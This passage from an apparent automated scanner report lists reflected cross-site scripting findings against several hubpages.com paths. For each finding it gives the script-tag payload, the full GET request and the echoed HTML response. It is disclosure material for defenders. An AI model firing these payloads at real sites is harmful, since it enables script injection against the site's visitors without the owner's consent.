<a href="#" onclick="showLinkArticle('/my/hubs1bf69"><script>alert(1)</script>92d7c54b2f9/stats', 'Page not found'); return false;">
...[SNIP]...

2.23. http://hubpages.com/my/hubs/stats [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /my/hubs/stats

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 277b5"><script>alert(1)</script>f325d2bc4d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:20:28 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/my/hubs/stats277b5"><script>alert(1)</script>f325d2bc4d8', 'Page not found'); return false;">
...[SNIP]...

2.24. http://hubpages.com/signin/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b32d"><script>alert(1)</script>e576f82391c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/8b32d"><script>alert(1)</script>e576f82391c/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

2.25. http://hubpages.com/topics/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /topics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f48"><script>alert(1)</script>a4d9d607aff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics99f48"><script>alert(1)</script>a4d9d607aff/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:16:38 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics99f48"><script>alert(1)</script>a4d9d607aff/', 'Page not found'); return false;">
...[SNIP]...

2.26. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /topics/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fdc"><script>alert(1)</script>33eb76fcea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Referer: http://hubpages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:36 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 66444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/topics/?27fdc"><script>alert(1)</script>33eb76fcea0=1', 'Popular Topics on HubPages'); return false;">
...[SNIP]...

2.27. http://hubpages.com/tour/affiliate [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a6d1"><script>alert(1)</script>cc37e02719e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:56 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour4a6d1"><script>alert(1)</script>cc37e02719e/affiliate', 'Page not found'); return false;">
...[SNIP]...

2.28. http://hubpages.com/tour/affiliate [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6a5"><script>alert(1)</script>b63f5c1a6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:58 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate2c6a5"><script>alert(1)</script>b63f5c1a6bd', 'HubPages Tour: not found'); return false;">
...[SNIP]...

2.29. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /tour/affiliate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afa9"><script>alert(1)</script>d4f4f14b999 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:53 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 11829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/tour/affiliate?1afa9"><script>alert(1)</script>d4f4f14b999=1', 'HubPages Affiliate Tour'); return false;">
...[SNIP]...

2.30. http://hubpages.com/user/new/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f280"><script>alert(1)</script>1667bd96a88 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user8f280"><script>alert(1)</script>1667bd96a88/new/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:10 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user8f280"><script>alert(1)</script>1667bd96a88/new/', 'Page not found'); return false;">
...[SNIP]...

2.31. http://hubpages.com/user/new/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e18"><script>alert(1)</script>a2b143d7180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new16e18"><script>alert(1)</script>a2b143d7180/ HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:17:12 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 5692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new16e18"><script>alert(1)</script>a2b143d7180/', 'Page not found'); return false;">
...[SNIP]...

2.32. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hubpages.com
Path:   /user/new/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efef0"><script>alert(1)</script>856b8cf17c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1 HTTP/1.1
Host: hubpages.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.1.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:16:59 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 13342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/user/new/?efef0"><script>alert(1)</script>856b8cf17c6=1', 'HubPages New User Signup'); return false;">
...[SNIP]...

2.33. https://hubpages.com/signin/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e65d"><script>alert(1)</script>fa4c40e1602db8724 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:51 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin9e65d"><script>alert(1)</script>fa4c40e1602db8724/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&usshem123=&ussisma123=&sublogin=Sign+In', 'Page not found'); return false;">
...[SNIP]...

2.34. https://hubpages.com/signin/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb436"><script>alert(1)</script>cb65b8029ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings. HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Feb 2011 18:18:12 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Content-Length: 5762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signinbb436"><script>alert(1)</script>cb65b8029ca/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.', 'Page not found'); return false;">
...[SNIP]...

2.35. https://hubpages.com/signin/ [explain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b61c0"><script>alert(1)</script>a1ea5dbbb55 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55 HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.2.10.1297448193

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:17:50 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.b61c0%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea1ea5dbbb55; path=/; domain=.hubpages.com
Content-Length: 7959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.b61c0"><script>alert(1)</script>a1ea5dbbb55', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.36. https://hubpages.com/signin/ [explain parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The value of the explain request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23034"><script>alert(1)</script>656acdcaa3ebf7318 was submitted in the explain parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In HTTP/1.1
Host: hubpages.com
Connection: keep-alive
Referer: https://hubpages.com/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.
Cache-Control: max-age=0
Origin: https://hubpages.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-456415558-1297448193205; __utmz=235386264.1297448193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235386264.478315573.1297448193.1297448193.1297448193.1; __utmc=235386264; __utmb=235386264.3.10.1297448193; ru=%2Fmy%2Fhubs%2Fstats; rutxt=view%20your%20account%20settings.

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Feb 2011 18:18:26 GMT
Content-Type: text/html
Connection: keep-alive
Vary: X-Forwarded-Proto,Accept-Encoding
Cache-Control: no-cache
Set-Cookie: ru=%2Fmy%2Fhubs%2Fstats; path=/; domain=.hubpages.com
Set-Cookie: rutxt=view%20your%20account%20settings.23034%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E656acdcaa3ebf7318; path=/; domain=.hubpages.com
Content-Length: 8011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="#" onclick="showLinkArticle('/signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.23034"><script>alert(1)</script>656acdcaa3ebf7318&usshem123=&ussisma123=&sublogin=Sign+In', 'Sign In to HubPages'); return false;">
...[SNIP]...

2.37. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hubpages.com
Path:   /signin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d52d"><script>alert(1)</script>3ecb0670d8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signin/?s=high&url=%2Fmy%2Fhubs%2Fstats&explain=view%20your%20account%20settings.&6d52d"><script>alert(1)</script>3ecb0670d8a=1 HTTP/1.1
Host: hubpages.com
